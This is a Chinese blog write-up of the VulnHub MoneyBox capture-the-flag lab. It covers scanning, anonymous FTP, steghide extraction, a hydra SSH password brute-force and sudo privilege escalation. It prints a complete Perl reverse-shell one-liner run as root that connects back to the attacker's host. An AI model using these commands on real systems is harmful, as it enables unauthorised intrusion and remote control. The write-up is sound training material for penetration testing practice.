VulnHub-MoneyBox

前言

  好长时间都没有写博客了,在打这个靶场的时候有些渗透命令都忘了😅。最近苑老师出了一套为期30周的打靶训练,点我传送。不出意外的话,我会同步更新,附上靶机下载地址。

环境介绍

  靶场目标获取3个flag,难度简单。这里有个坑,靶机下载后,默认会扫描不到ip地址。所以要对靶机进行设置,移步此教程,之后在重启靶机,即可通过nmap扫到ip地址。

信息搜集

  通过nmap扫出靶机ip:192.168.127.128,使用nmap -p- 192.168.127.128 -sV获取到如下信息。
  
  一共开放了3个端口,继续使用nmap -p21,22,80 -sC 192.168.127.128对端口进行深入的漏洞扫描。
  
  也就发现了ftp可以匿名登录,将上面的trytofind.jpg下载下来,如下图所示
  
  这个肯定是隐写术,后面会用到。继续访问网页
  
  告诉你这是一个非常简单的靶场,不要想的太复杂。查看网页源代码后,没有发现有价值的东西。使用python dirsearch.py -u http://192.168.127.128/进行目录扫描
  
  访问blogs目录
  
  表面上也是啥也没有,但源代码终于发现东西了。
  
  访问S3cr3t-T3xt目录
  
  继续查看源代码得到密码:3xtr4ctd4t4
  
  截止目前为止拿到了一个密码,和一张图片。现在该对图片进行解密了。

图片解密

  本人不怎么打ctf,所以对隐写术了解的少之甚少。顺便也对此方面进行一个了解,本次的隐写工具Steghide,查看图片中嵌入的文件信息steghide info trytofind.jpg,输入密码:3xtr4ctd4t4
  
  隐藏了data.txt,输入steghide extract -sf trytofind.jpg,来提取隐藏文件。
  

flag1

  得到一个用户名:renu,密码不知,接下来就要爆破ssh了,献出hydra来跑。
  hydra -l renu -P rockyou.txt -f 192.168.127.128 ssh,得到密码987654321。
  
  成功登录后,发现当前目录有个user1.txt,得到flag1
  

flag2

  flag2存在与home/lily,这个flag非常容易就拿到了。
  

flag3

  尝试进入/root目录下,发现权限不够,当然要提权了。使用linux-exploit-suggester,来查询可提权的cve。
  
  这三个cve尝试后无果,渗透貌似卡住了。再想想前面说的这只是一个简单的靶场,不要想的太复杂。那就使用history命令看看干了什么吧。
  
  注意ssh-copy-id lily@192.168.43.80这条命令,ssh-copy-id 的命令是复制SSH密钥到目标主机,开启无密码SSH登录。
  查看renu下的ssh信息,和lily下的ssh信息,对比发现是一样的
  
  使用ssh lily@127.0.0.1即可免密成功登录,再次尝试进入root目录,权限还是不足。再次使用history命令
  
  有个sudo -l命令,查看一下权限
  
  /usr/bin/perl 可以用root权限执行,那么执行一个perl的反弹shell

sudo /usr/bin/perl -e 'use Socket;$i="192.168.127.132";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

  kali开启监听4444端口后,执行上面的反弹shell命令。成功得到root权限,最后flag在/root/.root.txt 文件。
  
  至此整个渗透结束了,总结下来,因为不会隐写术,导致整个渗透流程卡了许久。还有在提权方面,直接上来就想用cve一把梭哈,也卡了半天。结果一条history命令,就打开一条通道,所以以后还是细心点吧!

查看评论 -
评论